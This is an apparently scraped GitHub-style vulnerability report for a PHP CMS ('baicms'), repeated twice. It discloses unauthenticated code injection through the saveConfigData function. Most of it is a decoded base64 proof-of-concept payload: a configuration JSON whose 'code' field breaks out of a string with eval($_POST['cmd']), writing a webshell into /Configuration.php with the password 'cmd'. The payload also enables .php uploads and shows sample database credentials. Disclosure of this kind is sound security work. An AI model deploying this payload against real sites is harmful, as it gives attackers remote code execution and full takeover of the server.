after base64decode is {"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}
we can code inject into the last line, and the final result is our shellcode injected to the /Configuration.php
The text was updated successfully, but these errors were encountered:
An Unauthorized attacker can execute arbitrary php code via
/classes/ajax/Functions.php,saveConfigDatafunctionpoc
then

/Configuration.phpis your webshell password iscmdanalysis
when parameter file is
after base64decode is

{"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}we can code inject into the last line, and the final result is our shellcode injected to the
/Configuration.phpThe text was updated successfully, but these errors were encountered: